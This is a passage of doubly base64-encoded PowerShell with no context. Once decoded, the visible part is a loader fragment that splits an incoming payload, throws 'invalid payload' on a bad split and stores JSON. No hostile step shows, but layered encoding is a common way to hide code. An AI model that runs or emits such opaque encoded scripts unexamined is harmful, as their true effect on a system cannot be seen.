ARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEA